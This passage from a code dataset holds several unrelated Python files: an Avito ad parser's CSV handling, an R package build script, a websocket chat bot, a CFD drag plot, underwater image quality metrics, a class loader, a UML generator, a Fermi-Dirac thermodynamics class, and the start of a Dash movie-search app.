'URL'])\r\n with open(filename, \"a\", newline=\"\", encoding='utf8') as file:\r\n writer = csv.writer(file, delimiter=';')\r\n writer.writerows(self.data)\r\n\r\n def loadDataFromCsv(self, csv_file):\r\n with open(csv_file, newline='', encoding='utf8') as csvfile:\r\n read_data = csv.reader(csvfile, delimiter=';')\r\n self.data.remove(['ID', 'Имя аккаунта', 'Название объявления', 'Дата', 'Адрес', 'Телефон', 'Очищенный телефон', 'URL'])\r\n for row in read_data:\r\n self.data.append(row)\r\n\r\n def cleanTableFromTrash(self):\r\n # iterate over a copy so rows can be removed from self.data safely\r\n for dt in self.data[:]:\r\n if len(dt) < 7:\r\n self.data.remove(dt)\r\n continue\r\n if len(dt[5]) > 15 or dt[5] == '-':\r\n self.data.remove(dt)\r\n\r\n\r\n\r\ndef compareItemsForUpdate(old_items, new_items):\r\n # keep only the URLs that are not already known\r\n output = []\r\n for new_item in new_items:\r\n if new_item not in old_items:\r\n print('[INF] Found new item: ' + new_item)\r\n output.append(new_item)\r\n return output\r\n\r\n\r\n\r\n\r\n","sub_path":"avito_parser.py","file_name":"avito_parser.py","file_ext":"py","file_size_in_byte":13540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
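The linear scan in compareItemsForUpdate above is O(len(old) x len(new)); a minimal equivalent sketch using a set for membership tests (same result, order of new_items preserved):

def compare_items_for_update(old_items, new_items):
    # O(1) membership tests instead of an inner loop over old_items
    seen = set(old_items)
    return [item for item in new_items if item not in seen]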
+{"seq_id":"265492391","text":"import os\nimport sys\nimport subprocess\nimport os.path\nimport fileinput\nimport re\nimport time\n\nimport Globals\n\nEX_OK = getattr(os, \"EX_OK\", 0)\n\nclass RLibrary:\n \"\"\"\n Build the R library\n \"\"\"\n def start(self):\n library_name = 'spm'\n binary_name = 'spm'\n if Globals.operating_system_ == 'windows':\n binary_name += '.exe'\n \n ## Check the SPM binary exists in the build directory. The R scripts need it to get versions and that sort of information. \n if not os.path.exists(Globals.build_directory_ ):\n print('Looking for spm binary in ' + Globals.build_directory_ )\n print('\\n\\n*****************\\nERROR\\n*****************\\nSPM binary was not found. Cannot continue\\n\\n')\n return False\n ## CHG Dir to R library\n os.chdir(Globals.root_directory_ + \"/R-libraries/\")\n ## Build Namespace\n os.system(\"R --vanilla < SPM_make_version.R\")\n ## Run roxygen to rebuild the documentation\n os.system(\"R --vanilla < run-roxygen.R\") \n ## build package\n os.system(\"R CMD build --force spm\")\n if Globals.install_r_library == 'true':\n os.system(\"R CMD INSTALL --build spm\")\n os.system(\"R CMD check spm\")\n os.system(\"cp -f spm_\" + Globals.SPM_version_number + \"* \" + Globals.root_directory_ + \"/Build\")\n #os.system(\"R CMD build --force spmTest\")\n #os.system(\"R CMD INSTALL --build spmTest\")\n #os.system(\"R CMD check spmTest\")\n #os.system(\"mv -f spmTest_\" + Globals.SPM_version_number + \"* \" + Globals.root_directory_ + \"/Build\")\n return True\n","sub_path":"BuildSystem/buildtools/classes/RLibrary.py","file_name":"RLibrary.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
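The os.system calls in RLibrary.start discard exit codes, so a failed R step can go unnoticed. A hedged sketch of the same sequence with subprocess.run, which raises on a non-zero exit (command strings taken verbatim from the class):

import subprocess

def run_r_steps():
    # Each step raises CalledProcessError on a non-zero exit code.
    for step in ("R --vanilla < SPM_make_version.R",
                 "R --vanilla < run-roxygen.R",
                 "R CMD build --force spm"):
        subprocess.run(step, shell=True, check=True)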
+{"seq_id":"43257970","text":"import json, time, atexit, websocket, sys, traceback, threading, tools\n\nimport commands\n\ndef view_traceback(e):\n print(str(type(e))+\": \"+str(e))\n ex_type, ex, tb = sys.exc_info()\n traceback.print_tb(tb)\n del tb\n\nclass FinitBot(object):\n def __init__(self, config_fn):\n self.config_fn=config_fn\n with open(self.config_fn,'r') as config_fd:\n self.config=json.load(config_fd)\n with open(self.config[\"sensitive_file\"], 'r') as s_fd:\n self.config.update(json.load(s_fd))\n self.permissions=tools.PermissionsModel(self.config[\"permissions\"])\n\n def start(self):\n atexit.register(self.save_config)\n self.ws=websocket.WebSocketApp(\"wss://anvel.io/?authPath=%2Fapi%2Fwebsockets%2Fauth&instance_id=M7AdOTjPvJbBYKDU&token=\"+self.config[\"auth\"],\n on_message=self.on_message)\n threading.Thread(target=self.shell).start()\n threading.Thread(target=self.autosave, daemon=True).start()\n self.ws.run_forever()\n\n def autosave(self):\n while 1:\n time.sleep(1)\n self.save_config()\n\n def shell(self):\n channel=\"finit\"\n while 1:\n try:\n command=input(\"$\")\n # elif keeps \"s\" from also firing on \"sc\"/\"wssend\" input\n if command.startswith(\"wssend\"):\n self.ws.send(command.replace(\"wssend \",\"\",1))\n elif command.startswith(\"sc\"):\n channel=command.replace(\"sc \",\"\",1)\n elif command.startswith(\"s\"):\n self.post_message(channel, command.replace(\"s \",\"\",1))\n elif command.startswith(\"exit\"):\n self.ws.close()\n except BaseException:\n self.ws.close()\n return\n\n def ws_sendj(self, data):\n # print(\">>\"+json.dumps(data))\n self.ws.send(json.dumps(data))\n\n def on_message(self, sock, message):\n try:\n data=json.loads(message)\n print(data)\n if data[\"event\"]==\"client-message\":\n self.process_messages(data[\"data\"])\n if data[\"event\"]==\"member-added\":\n self.process_join(data[\"data\"], data[\"channel\"])\n if data[\"event\"]==\"connected\":\n print(\"Subscribing!\")\n for channel in self.config[\"channels\"]:\n self.ws_sendj({\"event\":\"subscribe\", \"channel\":\"pub_\"+channel})\n except BaseException as e:\n if isinstance(e, KeyboardInterrupt): sys.exit()\n view_traceback(e)\n\n def process_join(self, data, channel):\n print(\"calling join\")\n getattr(commands, self.config[\"join_command\"])(self, channel.replace(\"pub_\",\"\",1), data[\"username\"])\n\n def process_messages(self, data):\n channel=data[\"channel\"].replace(\"pub_\",\"\",1)\n self.process_message(data[\"sender\"][\"username\"], channel, data[\"body\"])\n\n def process_message(self, username, channel, body):\n print(\"#\"+channel+\" @\"+username+\":\\t\"+body)\n if body[0]==';':\n data=body[1:]\n args=list(data.split(\" \"))\n try:\n if args[0].startswith(\";\"):\n args.append(args[0].replace(\";\",\"\",1))\n args[0]=\"meme\"\n\n tools._check_permlevel(self, channel, username, 0)\n getattr(commands, args[0])(self, channel, username, 0, data[len(args[0])+1:], *args[1:] if len(args) else [])\n except TypeError as e:\n self.post_message(channel, str(e))\n except tools.PermissionsError as e:\n self.post_message(channel, str(e))\n except AssertionError as e:\n self.post_message(channel, str(e))\n\n def post_message(self, channel, message):\n self.ws_sendj({\"event\":\"client-message\",\"channel\":\"pub_\"+channel,\"data\":{\"body\":message}})\n\n def save_config(self):\n json.dump(self.config, open(self.config_fn,'w'), indent=4)\n\nif __name__==\"__main__\":\n try:\n FinitBot(\"config.json\").start()\n except BaseException as e:\n view_traceback(e)\n input()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
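The prefix checks in FinitBot.shell can also be driven by a table, which keeps the "s"/"sc"/"wssend" precedence explicit; a small sketch (names hypothetical):

def split_command(command):
    # Longest prefixes first so "s" cannot shadow "sc" or "wssend".
    for prefix in ("wssend ", "sc ", "s ", "exit"):
        if command.startswith(prefix):
            return prefix.strip(), command[len(prefix):]
    return None, command

# e.g. split_command("sc finit") -> ("sc", "finit")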
+{"seq_id":"541488155","text":"\"\"\"Plot the history of the drag coefficient.\n\nCompare with the numerical results reported in Koumoutsakos & Leonard (1995).\n\n_References:_\n\n* Koumoutsakos, P., & Leonard, A. (1995).\n High-resolution simulations of the flow around an impulsively started\n cylinder using vortex methods.\n Journal of Fluid Mechanics, 296, 1-38.\n\n\"\"\"\n\nfrom matplotlib import pyplot\nimport numpy\nimport pathlib\n\nimport petibmpy\n\n\n# Set directories and parameters.\nsimudir = pathlib.Path(__file__).absolute().parents[1]\nrootdir = simudir.parents[2]\ndatadir = rootdir / 'data'\nshow_figure = True # display the Matplotlib figure\nsave_figure = True # save the Matplotlib figure as PNG\n\n# Load drag force from file and compute drag coefficient.\nfilepath = simudir / 'output' / 'forces-0.txt'\nt, fx, _ = petibmpy.read_forces(filepath)\ncd = 2 * fx\n\n# Load drag coefficient from Koumoutsakos & Leonard (1995).\nfilename = 'koumoutsakos_leonard_1995_cylinder_dragCoefficientRe550.dat'\nfilepath = datadir / filename\nt2, cd2 = petibmpy.read_forces(filepath)\nt2 *= 0.5\n\n# Plot the history of the drag coefficient.\npyplot.rc('font', family='serif', size=14)\nfig, ax = pyplot.subplots(figsize=(6.0, 4.0))\nax.set_xlabel('Non-dimensional time')\nax.set_ylabel('Drag coefficient')\nax.plot(t, cd, label='PetIBM')\nax.plot(t2, cd2, label='Koumoutsakos \\n& Leonard (1995)',\n marker='o', linewidth=0, color='black')\nax.axis((0.0, 3.0, 0.0, 2.0))\nax.legend(frameon=False)\nfig.tight_layout()\n\nif show_figure:\n pyplot.show()\n\nif save_figure:\n figdir = simudir / 'figures'\n figdir.mkdir(parents=True, exist_ok=True)\n filepath = figdir / 'drag_coefficient.png'\n fig.savefig(filepath, dpi=300, bbox_inches='tight')\n","sub_path":"examples/decoupledibpm/cylinder2dRe550/scripts/plot_drag_coefficient.py","file_name":"plot_drag_coefficient.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
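Beyond the history plot, a single steady-state number is sometimes handy; a sketch averaging the already-loaded t and cd arrays over a late-time window (bounds arbitrary here):

import numpy as np

def mean_cd(t, cd, t_start=2.0, t_end=3.0):
    # Average the drag coefficient over [t_start, t_end].
    mask = (t >= t_start) & (t <= t_end)
    return float(np.mean(cd[mask]))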
+{"seq_id":"183458440","text":"'''\nMetrics for underwater image quality evaluation.\n\nAuthor: Xuelei Chen \nEmail: chenxuelei@hotmail.com\n\nUsage:\npython evaluate.py RESULT_PATH REFERENCE_PATH\n'''\nimport numpy as np\nfrom skimage.measure import compare_ssim\nimport math\nimport sys\nfrom skimage import io, color, filters\nimport os\n\ndef rmetrics(a,b):\n \n # psnr (images are assumed to be floats in [0, 1])\n mse = np.mean((a-b)**2)\n psnr = 10*math.log10(1/mse)\n\n #ssim\n ssim = compare_ssim(a,b,multichannel=True)\n\n return psnr, ssim\n\ndef nmetrics(a):\n rgb = a\n lab = color.rgb2lab(a)\n gray = color.rgb2gray(a)\n # UCIQE\n c1 = 0.4680\n c2 = 0.2745\n c3 = 0.2576\n l = lab[:,:,0]\n\n #1st term\n chroma = (lab[:,:,1]**2 + lab[:,:,2]**2)**0.5\n uc = np.mean(chroma)\n sc = (np.mean((chroma - uc)**2))**0.5\n\n #2nd term: mean of the brightest 1% minus mean of the darkest 1% of luminance\n top = int(np.round(0.01*l.shape[0]*l.shape[1]))\n sl = np.sort(l,axis=None)\n isl = sl[::-1]\n conl = np.mean(isl[:top]) - np.mean(sl[:top])\n\n #3rd term\n satur = []\n chroma1 = chroma.flatten()\n l1 = l.flatten()\n for i in range(len(l1)):\n if chroma1[i] == 0: satur.append(0)\n elif l1[i] == 0: satur.append(0)\n else: satur.append(chroma1[i] / l1[i])\n\n us = np.mean(satur)\n\n uciqe = c1 * sc + c2 * conl + c3 * us\n\n # UIQM\n p1 = 0.0282\n p2 = 0.2953\n p3 = 3.5753\n\n #1st term UICM\n rg = rgb[:,:,0] - rgb[:,:,1]\n yb = (rgb[:,:,0] + rgb[:,:,1]) / 2 - rgb[:,:,2]\n rgl = np.sort(rg,axis=None)\n ybl = np.sort(yb,axis=None)\n al1 = 0.1\n al2 = 0.1\n T1 = int(al1 * len(rgl))\n T2 = int(al2 * len(rgl))\n rgl_tr = rgl[T1:-T2]\n ybl_tr = ybl[T1:-T2]\n\n urg = np.mean(rgl_tr)\n s2rg = np.mean((rgl_tr - urg) ** 2)\n uyb = np.mean(ybl_tr)\n s2yb = np.mean((ybl_tr- uyb) ** 2)\n\n uicm = -0.0268 * np.sqrt(urg**2 + uyb**2) + 0.1586 * np.sqrt(s2rg + s2yb)\n\n #2nd term UISM (k1k2=8x8)\n Rsobel = rgb[:,:,0] * filters.sobel(rgb[:,:,0])\n Gsobel = rgb[:,:,1] * filters.sobel(rgb[:,:,1])\n Bsobel = rgb[:,:,2] * filters.sobel(rgb[:,:,2])\n\n Rsobel=np.round(Rsobel).astype(np.uint8)\n Gsobel=np.round(Gsobel).astype(np.uint8)\n Bsobel=np.round(Bsobel).astype(np.uint8)\n\n Reme = eme(Rsobel)\n Geme = eme(Gsobel)\n Beme = eme(Bsobel)\n\n uism = 0.299 * Reme + 0.587 * Geme + 0.114 * Beme\n\n #3rd term UIConM\n uiconm = logamee(gray)\n\n uiqm = p1 * uicm + p2 * uism + p3 * uiconm\n return uiqm,uciqe\n\ndef eme(ch,blocksize=8):\n\n num_x = math.ceil(ch.shape[0] / blocksize)\n num_y = math.ceil(ch.shape[1] / blocksize)\n \n eme = 0\n w = 2. / (num_x * num_y)\n for i in range(num_x):\n\n xlb = i * blocksize\n if i < num_x - 1:\n xrb = (i+1) * blocksize\n else:\n xrb = ch.shape[0]\n\n for j in range(num_y):\n\n ylb = j * blocksize\n if j < num_y - 1:\n yrb = (j+1) * blocksize\n else:\n yrb = ch.shape[1]\n \n block = ch[xlb:xrb,ylb:yrb]\n\n blockmin = float(np.min(block))\n blockmax = float(np.max(block))\n\n # # old version\n # if blockmin == 0.0: eme += 0\n # elif blockmax == 0.0: eme += 0\n # else: eme += w * math.log(blockmax / blockmin)\n\n # new version\n if blockmin == 0: blockmin+=1\n if blockmax == 0: blockmax+=1\n eme += w * math.log(blockmax / blockmin)\n return eme\n\ndef plipsum(i,j,gamma=1026):\n return i + j - i * j / gamma\n\ndef plipsub(i,j,k=1026):\n return k * (i - j) / (k - j)\n\ndef plipmult(c,j,gamma=1026):\n return gamma - gamma * (1 - j / gamma)**c\n\ndef logamee(ch,blocksize=8):\n\n num_x = math.ceil(ch.shape[0] / blocksize)\n num_y = math.ceil(ch.shape[1] / blocksize)\n \n s = 0\n w = 1. / (num_x * num_y)\n for i in range(num_x):\n\n xlb = i * blocksize\n if i < num_x - 1:\n xrb = (i+1) * blocksize\n else:\n xrb = ch.shape[0]\n\n for j in range(num_y):\n\n ylb = j * blocksize\n if j < num_y - 1:\n yrb = (j+1) * blocksize\n else:\n yrb = ch.shape[1]\n \n block = ch[xlb:xrb,ylb:yrb]\n blockmin = float(np.min(block))\n blockmax = float(np.max(block))\n\n top = plipsub(blockmax,blockmin)\n bottom = plipsum(blockmax,blockmin)\n\n m = top/bottom\n if m == 0.:\n s+=0\n else:\n s += (m) * np.log(m)\n\n return plipmult(w,s)\n\ndef main():\n result_path = sys.argv[1]\n reference_path = sys.argv[2]\n\n result_dirs = os.listdir(result_path)\n # reference_dirs = os.listdir(reference_path)\n\n sumpsnr, sumssim, sumuiqm, sumuciqe = 0.,0.,0.,0.\n\n N=0\n for imgdir in result_dirs:\n if '.png' in imgdir:\n #corrected image\n corrected = io.imread(os.path.join(result_path,imgdir))\n\n #reference image\n imgname = imgdir.split('corrected')[0]\n refdir = imgname+'.png'\n reference = io.imread(os.path.join(reference_path,refdir))\n\n psnr,ssim = rmetrics(corrected,reference)\n\n uiqm,uciqe = nmetrics(corrected)\n\n sumpsnr += psnr\n sumssim += ssim\n sumuiqm += uiqm\n sumuciqe += uciqe\n N +=1\n\n with open(os.path.join(result_path,'metrics.txt'), 'a') as f:\n f.write('{}: psnr={} ssim={} uiqm={} uciqe={}\\n'.format(imgname,psnr,ssim,uiqm,uciqe))\n\n mpsnr = sumpsnr/N\n mssim = sumssim/N\n muiqm = sumuiqm/N\n muciqe = sumuciqe/N\n\n with open(os.path.join(result_path,'metrics.txt'), 'a') as f:\n f.write('Average: psnr={} ssim={} uiqm={} uciqe={}\\n'.format(mpsnr, mssim, muiqm, muciqe))\n\nif __name__ == '__main__':\n main()","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
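A quick sanity check of the no-reference metrics above is to feed nmetrics a synthetic float image in [0, 1] (real use would rescale a loaded photo, e.g. io.imread(path) / 255.0):

import numpy as np

rng = np.random.default_rng(0)
img = rng.random((64, 64, 3))   # random RGB image with values in [0, 1]
uiqm, uciqe = nmetrics(img)
print('UIQM = {:.3f}, UCIQE = {:.3f}'.format(uiqm, uciqe))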
+{"seq_id":"111985426","text":"import inspect\nimport pkg_resources\nfrom .compat import import_module\nfrom .pip_manager import PackageNotFound\n\n\nclass ClassLoaderException(Exception):\n pass\n\n\nclass ClassLoader(object):\n \"\"\"\n this is a helper class to help load class objects.\n (buildout recipes and isotopes)\n\n it will attempt to retrieve eggs on the fly to satisfy\n requirements.\n \"\"\"\n\n def __init__(self, pip_manager):\n self._pip = pip_manager\n\n def get_entry_point(self, entry_point, group):\n if \":\" in entry_point:\n dist, name = entry_point.split(\":\")\n else:\n dist, name = entry_point, \"default\"\n\n try:\n import_module(dist)\n except ImportError:\n self._install_egg(dist)\n\n return pkg_resources.load_entry_point(\n dist, group, name\n )\n\n def get_class(self, class_module_path):\n \"\"\"\n get the first class found from a module.\n\n this is how uranium finds the class itself.\n \"\"\"\n module = self.get_module(class_module_path)\n\n classes = _get_classes_from_module(module)\n\n if len(classes) == 0:\n raise ClassLoaderException(\n \"module {0}\".format(module) +\n \" does not have a class!\"\n )\n\n return classes[0]\n\n def get_module(self, module_path):\n # look for module\n # if it doesn't exist, download from pip\n # return module or raise exception?\n try:\n return import_module(module_path)\n except ImportError:\n try:\n self._install_egg(module_path)\n return import_module(module_path)\n except (PackageNotFound, ImportError):\n raise ClassLoaderException(\n \"unable to find module or python package \"\n \"{0}\".format(module_path)\n )\n\n def _install_egg(self, egg_name):\n try:\n self._pip.add_eggs({egg_name: None})\n self._pip.install()\n except (PackageNotFound, ImportError):\n raise ClassLoaderException(\n \"unable to install egg {0}\".format(egg_name)\n )\n\n\ndef _get_classes_from_module(module):\n member_dict = dict(inspect.getmembers(module))\n\n def is_class_from_module(cls):\n return inspect.isclass(cls) and inspect.getmodule(cls) == module\n\n return [v for v in member_dict.values() if is_class_from_module(v)]\n","sub_path":"uranium/classloader.py","file_name":"classloader.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
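_get_classes_from_module can be exercised without the pip machinery; a small sketch with a throwaway module (registered in sys.modules so inspect.getmodule can resolve it):

import sys, types

mod = types.ModuleType('demo_mod')
sys.modules['demo_mod'] = mod
exec('import os\nclass Recipe:\n    pass\n', mod.__dict__)

# Only classes defined *in* the module are returned; imported names are ignored.
print(_get_classes_from_module(mod))   # [<class 'demo_mod.Recipe'>]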
+{"seq_id":"503706335","text":"# -*- coding: UTF-8 -*-\r\nimport json\r\n\r\nwith open('./case.json','r',encoding = 'utf-8') as f:\r\n json_list = json.load(f)\r\n # 2D array generation (earlier experiments kept below)\r\n # for i in json_list:\r\n # print(type(i['name']))\r\n # i['prerequisites'].encode('utf-8')\r\n # nameCaseList = set([case['name'] for case in json_list])\r\n # prerequisitesList = set([case['prerequisites'] for case in json_list])\r\n # for i in nameCaseList:\r\n # print(i)\r\n # print(prerequisitesList)\r\n exam = open(\"./uml/example.uml\",\"w+\",encoding = 'utf-8')\r\n exam.write(\"@startuml\\n\")\r\n exam.write(\":普通用户: as user\\n\") # \":普通用户:\" is the \"ordinary user\" actor\r\n for i in json_list:\r\n exam.write(\"(\"+i['name']+\")\\n\")\r\n for j in json_list:\r\n if j['prerequisites'] != []:\r\n for i in j['prerequisites']:\r\n exam.write(\"(\"+j['name']+\")\"+\"--|>\"+\"(\"+i+\")\\n\")\r\n else:\r\n exam.write(\"user\"+\"->\"+\"(\"+j['name']+\")\"+\"\\n\")\r\n exam.write(\"@enduml\\n\")\r\n exam.close()\r\n","sub_path":"requirments/source/userOriented/AutoCaseDiagram.py","file_name":"AutoCaseDiagram.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
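The script assumes case.json holds a list of use cases with name and prerequisites keys; a minimal input that exercises both branches of the loop (contents hypothetical):

import json

cases = [
    {'name': 'Login', 'prerequisites': []},               # linked to the user actor
    {'name': 'Post comment', 'prerequisites': ['Login']}  # drawn with --|> to its prerequisite
]
with open('case.json', 'w', encoding='utf-8') as f:
    json.dump(cases, f, ensure_ascii=False)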
+{"seq_id":"427342136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport numpy as np\nfrom scipy.constants import physical_constants\nfrom scipy.integrate import simps\nfrom scipy.optimize import brentq\nfrom . import fermi_dirac_distribution\n\nk_b = physical_constants['Boltzmann constant in eV/K'][0]\n\n\ndef s(f):\n return -(np.log(f ** f) + np.log((1.0 - f) ** (1.0 - f)))\n\n\nclass FixedDOSApproximation(object):\n \"\"\"\n\n Attributes\n ----------\n chemical_potentials : 1d array.\n Chemical potentials at the given temperatures (eV).\n\n Notes\n -----\n In [X. Zhang et al., Phys. Rev. B 95, 165126 (2017)], the Fermi energy\n is kept fixed at finite temperatures as well. This, however, is not\n robust against a shift of the energy origin\n \\epsilon -> \\epsilon + \\epsilon_0 because\n .. math ::\n\n \\epsilon_0 \\int_{-\\infty}^{\\infty} D(\\epsilon)\n (f(\\epsilon) - f_0(\\epsilon)) d\\epsilon \\neq 0\n\n In other words, the fixed-Fermi-energy scheme depends on the choice of\n the energy origin. To address this issue, this class first computes the\n chemical potential for each temperature such that the number of\n (partially) occupied states is the same as that at 0 K, and then\n computes the other thermodynamic properties using the chemical\n potential at the finite temperature.\n\n If the energy step is not small enough, the numerical integrals for the\n thermodynamic properties are not sufficiently accurate, particularly at\n low temperatures, and deviate from the results of the Sommerfeld\n approximation.\n \"\"\"\n def __init__(self, temperatures, energies, dos, fermi_energy,\n near_fermi=True, edelta=0.001):\n \"\"\"\n\n Parameters\n ----------\n temperatures : 1d array.\n Temperature (K).\n energies : (nedos) 1d array.\n Energies corresponding to DOS (eV).\n dos : (nedos) 1d array.\n DOS (eV^-1).\n fermi_energy : float, optional\n Fermi energy (eV).\n near_fermi : bool, optional\n Whether to consider only the region near the Fermi energy. This\n may help to avoid unnecessary computation while keeping good\n accuracy, particularly at low temperatures.\n edelta : float, optional\n Energy step for the evaluation grid (eV). Valid only when near_fermi\n is True. 
The default value may be suitable for typical temperature\n range of hundreds up to few thousands Kelvin.\n \"\"\"\n self.temperatures = np.atleast_1d(temperatures)\n if near_fermi:\n self.energies, self.dos = self._calculate_energy_and_dos(\n temperatures, energies, dos, fermi_energy, edelta)\n else:\n self.energies = energies.copy()\n self.dos = dos.copy()\n\n self.fermi_energy = fermi_energy\n self.number_occupied = self.calculate_number_occupied(\n temperature=0.0, mu=self.fermi_energy)\n\n self.chemical_potentials = np.full_like(self.temperatures, np.nan)\n self.numbers = np.full_like(self.temperatures, np.nan)\n self.internal_energies = np.full_like(self.temperatures, np.nan)\n self.entropies = np.full_like(self.temperatures, np.nan)\n self.helmholtz_energies = np.full_like(self.temperatures, np.nan)\n\n @staticmethod\n def _calculate_energy_and_dos(\n temperatures, energies, dos, fermi_energy, edelta):\n \"\"\"Calculate energy and dos for thermodynamic properties.\"\"\"\n # # Energy window.\n # # Outside this, the Fermi-Dirac distribution is just 0.0 or 1.0.\n width = k_b * np.max(temperatures) * 40.0\n emin = fermi_energy - width\n emax = fermi_energy + width\n\n energies_new = np.arange(emin, emax, edelta)\n dos_new = np.interp(energies_new, energies, dos, left=0.0, right=0.0)\n return energies_new, dos_new\n\n def run(self):\n mu0, n0, u0, entropy0 = self._run_temperature(0.0)\n\n for i, t in enumerate(self.temperatures):\n mu, n, u, entropy = self._run_temperature(t)\n\n self.chemical_potentials[i] = mu\n self.numbers[i] = n\n self.internal_energies[i] = u\n self.entropies[i] = entropy\n\n self.internal_energies -= u0\n\n self.helmholtz_energies = self.calculate_helmholtz_energy()\n\n def _run_temperature(self, temperature):\n energies = self.energies\n dos = self.dos\n\n mu = self.calculate_chemical_potential(\n temperature=temperature,\n number_occupied=self.number_occupied,\n energies=energies,\n )\n fd = fermi_dirac_distribution(temperature, mu, energies)\n\n n = self.calculate_n_from_fermi_dirac(fd, energies, dos)\n u = self.calculate_u_from_fermi_dirac(fd, energies, dos)\n entropy = self.calculate_s_from_fermi_dirac(fd, energies, dos)\n\n return mu, n, u, entropy\n\n def calculate_chemical_potential(self, temperature, number_occupied, energies):\n def func(x):\n n = self.calculate_number_occupied(temperature, x)\n return n - number_occupied\n\n a = np.min(energies)\n b = np.max(energies)\n mu, r = brentq(func, a, b, xtol=1e-16, full_output=True)\n\n if not r.converged:\n raise ValueError\n\n return mu\n\n def calculate_number_occupied(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_n_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_n_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate number of particles.\"\"\"\n return simps(dos * fd, energies)\n\n def calculate_internal_energy(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_u_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_u_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate internal energy.\"\"\"\n return simps(dos * fd * energies, energies)\n\n def calculate_entropy(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_s_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_s_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate 
entropy.\"\"\"\n return k_b * simps(dos * s(fd), energies)\n\n def calculate_helmholtz_energy(self):\n return self.internal_energies - self.temperatures * self.entropies\n\n @staticmethod\n def from_dos_object(dos_object, temperatures, *args, **kwargs):\n return FixedDOSApproximation(\n temperatures=temperatures,\n energies=dos_object.energies,\n dos=dos_object.dos.sum(axis=0),\n fermi_energy=dos_object.fermi_energy,\n *args,\n **kwargs)\n","sub_path":"cmtools/electronic/fixed_dos_approximation.py","file_name":"fixed_dos_approximation.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
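A minimal run of FixedDOSApproximation against a model DOS shows the intended call pattern (all numbers arbitrary; fermi_dirac_distribution comes from the package itself):

import numpy as np

energies = np.linspace(-5.0, 5.0, 2001)              # eV
dos = np.sqrt(np.clip(energies + 5.0, 0.0, None))    # model sqrt-shaped DOS (eV^-1)
temperatures = np.array([300.0, 600.0, 900.0])       # K

fda = FixedDOSApproximation(temperatures, energies, dos, fermi_energy=0.0)
fda.run()
print(fda.chemical_potentials)   # mu(T) in eV
print(fda.helmholtz_energies)    # F(T) relative to U at 0 K, in eV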
+{"seq_id":"633926936","text":"\"\"\"\n==============\ntest_fizz_buzz\n==============\n\nTest fizz_buzz solution.\n\n:Author: Ricardo Lima \n:Copyright: © 2016 Ricardo José Pontes Lima Filho. All rights reserved.\n:License: BSD—see LICENSE file for more details.\n:Version: 0.1.0\n\"\"\"\n\nfrom codeevalsolutions.fizz_buzz import custom_fizz_buzz, main\n\n\nclass TestFizzBuzz:\n def test_1(self):\n assert custom_fizz_buzz(3, 5, 10) == '1 2 F 4 B F 7 8 F B'\n\n def test_2(self):\n assert custom_fizz_buzz(2, 7, 15) == ('1 F 3 F 5 F B F 9 F 11 F 13 '\n 'FB 15')\n\n def test_3(self):\n assert custom_fizz_buzz(5, 11, 35) == (\n '1 2 3 4 F 6 7 8 9 F B 12 13 14 F 16 17 18 19 F 21 B 23 24 F 26 '\n '27 28 29 F 31 32 B 34 F')\n\n\nclass TestMain:\n def test_1(self, tmpdir, capsys):\n text = '3 5 10\\n2 7 15\\n5 11 35\\n'\n output = ('1 2 F 4 B F 7 8 F B\\n'\n '1 F 3 F 5 F B F 9 F 11 F 13 FB 15\\n'\n '1 2 3 4 F 6 7 8 9 F B 12 13 14 F 16 17 18 19 F 21 B 23 24 '\n 'F 26 27 28 29 F 31 32 B 34 F\\n')\n f = tmpdir.mkdir('tmp').join('input.txt')\n f.write(text)\n main([str(f)])\n out, err = capsys.readouterr()\n assert out == output\n","sub_path":"tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219145850","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[139]:\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport base64\nimport pandas as pd\nfrom bs4 import BeautifulSoup \nimport requests\n\n# In[141]:\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP],\n meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=0.55\"}]\n )\n\n#####------------------Controls Starts Here-------------------------######\n# Colors\nbanner_color = 'black'\ntitle_font_color = 'black'\nfont_color = '#FFFFFF'\nbackground_color = 'E3E2DC'\ntile_color = '#333333'\n\n# Controls\ncontrols = dbc.Card(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n dbc.Label(\"Enter Movie Name: \"),\n html.Div([\n dcc.Input(id='my_input', value='Star Wars: Episode IX - The Rise of Skywalker', \n placeholder = 'Search Movie', type='text', style = {'width':'100%'})]),\n ],\n xs=12, sm=12, md=12, lg=4, xl=4,\n ),\n dbc.Col(\n [\n dbc.Button(\"Search for the 